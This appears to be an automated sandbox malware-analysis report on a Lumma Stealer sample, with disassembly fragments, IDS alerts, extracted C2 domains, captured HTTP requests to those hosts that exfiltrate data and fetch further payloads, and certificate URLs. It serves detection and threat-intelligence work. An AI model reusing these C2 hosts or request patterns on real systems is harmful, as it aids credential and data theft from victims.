Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov edx, ecx	0_2_0295B314
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+esi-000000D2h]	0_2_02989344
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_02991374
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [ecx], dl	0_2_0296A360
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [ebx+ecx*8], 4B1BF3DAh	0_2_0298A0B8
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx esi, byte ptr [eax+edx+1FA250D6h]	0_2_029750E1
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_0297602C
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_0297A061
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_0297B182
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [ebp+00h], cl	0_2_029781B8
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_029681C7
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov eax, 00000001h	0_2_029661FA
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7BEC65C7h]	0_2_0296A119
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_0297913F
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov ebx, eax	0_2_02957144
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov ebp, eax	0_2_02957144
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0297E145
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0297E148
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov dword ptr [esp+08h], edx	0_2_029896A4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then jmp eax	0_2_0297A6D4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov ecx, ebx	0_2_0297164D
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov word ptr [esi], dx	0_2_0297164D
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [edi]	0_2_0297E7F8
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0297C7ED
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+eax+2Ch]	0_2_0297A734
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 40C3E6E8h	0_2_02991734
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov edi, ecx	0_2_0296C4E0
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_0296D425
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov esi, dword ptr [eax+04h]	0_2_02974452
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov eax, dword ptr [00449094h]	0_2_0298E449
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_0297B594
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov edx, dword ptr [esi+1Ch]	0_2_0297E583
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 385488F2h	0_2_029795BC
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov edx, ecx	0_2_02991504
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 6B77B5E1h	0_2_02991504
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_0298D544
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 06702B10h	0_2_0298D544
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 2213E57Fh	0_2_0298D544
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 7F7BECC6h	0_2_0298D544
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [edi], dl	0_2_0297C569
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [ebp+eax-000000A7h]	0_2_0296DAA4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov word ptr [ebx], ax	0_2_0296DAA4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [edi], cl	0_2_0297EA21
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_02986A64
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_0297BB54
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx ebp, word ptr [eax]	0_2_02990B44
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0297C88A
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	0_2_0296A8E4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx ebx, byte ptr [edi+edx]	0_2_0297E8E2
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp word ptr [ebp+eax+00h], 0000h	0_2_02965874
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 38B2B0F7h	0_2_02991864
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [edi], al	0_2_0297C916
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 6E87DD67h	0_2_02977914
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx edx, byte ptr [eax]	0_2_02977914
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov edi, dword ptr [esi+000000B8h]	0_2_0297CE8C
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov word ptr [ebx], ax	0_2_0296DEA8
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+38h]	0_2_0295CEFF
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+38h]	0_2_0295CEFF
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	0_2_02979E06
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+4E934F71h]	0_2_0296BE74
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_02965E74
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [ecx], dl	0_2_02968FAD
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_0297BFC4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_0295BFF4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov ecx, edx	0_2_0295BFF4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02976F24
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_02974F2A
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov eax, 00000001h	0_2_02977F2A
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov edi, ecx	0_2_0297DF58
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov esi, eax	0_2_02966C9E
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov edx, dword ptr [esi+08h]	0_2_0297CC8F
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_02958CB4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_02958CB4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov esi, eax	0_2_02977CFF
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov ecx, eax	0_2_0296EC04
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-05422073h]	0_2_0298EC40
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-2DA65EDFh]	0_2_02969D9D
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_0297DDA8
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then mov byte ptr [ebx], cl	0_2_0297DDA8
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_02975DFA
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h	0_2_02975DFA
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 4x nop then lea edx, dword ptr [ecx+000000F2h]	0_2_0295ADE4

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49712 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49752 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49712 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49789 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: locketsashayz.click
Source: Malware configuration extractor	URLs: nearycrepso.shop

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49729 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49741 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49752 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49760 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49777 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49789 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49800 -> 185.161.251.21:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49805 -> 104.21.37.128:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2008438 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send a Text File : 104.21.37.128:443 -> 192.168.2.6:49805

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locketsashayz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 78Host: locketsashayz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=P68L60WHHINDA9MUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12840Host: locketsashayz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=M1WIYCAIUR6I14User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15080Host: locketsashayz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JHXTJB6YR5T17User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19932Host: locketsashayz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=077G7BBQYBUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 5427Host: locketsashayz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YALTMAV0YT1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1192Host: locketsashayz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2A9SX09VKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 576103Host: locketsashayz.click
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 113Host: locketsashayz.click
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
Source: global traffic	HTTP traffic detected: GET /int_clp_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop

Source: global traffic	DNS traffic detected: DNS query: locketsashayz.click
Source: global traffic	DNS traffic detected: DNS query: cegu.shop
Source: global traffic	DNS traffic detected: DNS query: klipvumisui.shop
Source: global traffic	DNS traffic detected: DNS query: dfgh.online

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: locketsashayz.click

Source: #Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: #Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: #Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: #Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: #Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: #Setup.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://certs.securetrust.com/issuers/TWGCA.crt0
Source: #Setup.exe, 00000000.00000003.2422784890.000000000075F000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/cscasha2.crl0q
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: powershell.exe, 00000005.00000002.2360275508.0000000000935000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2377053357.0000000006FD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: #Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: #Setup.exe, 00000000.00000003.2422784890.000000000075F000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://crl.securetrust.com/TWGCSCA_L1.crl0y
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://crl.trustwave.com/TWGCA.crl0n
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crl.usertr
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://crl.vikingcloud.com/TWGCA.crl0t
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0
Source: #Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: #Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: #Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: #Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: #Setup.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #Setup.exe	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: #Setup.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: #Setup.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: #Setup.exe	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: #Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/Sectig
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://cscasha2.ocsp-certum.com04
Source: BrightLib.exe, 00000026.00000002.2956574115.00000000032E0000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000026.00000002.2957324319.000000000635F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://michaeluno.jp/
Source: powershell.exe, 00000005.00000002.2374022259.00000000057AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: #Setup.exe	String found in binary or memory: http://ocsp.digicert.com0
Source: #Setup.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: #Setup.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: #Setup.exe	String found in binary or memory: http://ocsp.digicert.com0L
Source: #Setup.exe, 00000000.00000003.2250320709.00000000037EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2457734373.0000000003B60000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 00000008.00000003.2465081724.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp, 0000000B.00000003.2985256842.0000000002590000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.sectigo.com0
Source: #Setup.exe, 00000000.00000003.2422784890.000000000075F000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://ocsp.securetrust.com/0?
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://ocsp.trustwave.com/06
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://ocsp.vikingcloud.com/0:
Source: #Setup.exe, 00000000.00000003.2422345792.0000000000760000.00000004.00000020.00020000.00000000.sdmp, #Setup.exe, 00000000.00000002.2433817040.00000000006DC000.00000004.00000020.00020000.00000000.sdmp, EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	String found in binary or memory: http://ocsp.vikingcloud.com/0A
Source: powershell.exe, 00000005.00000002.2361342386.0000000004896000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
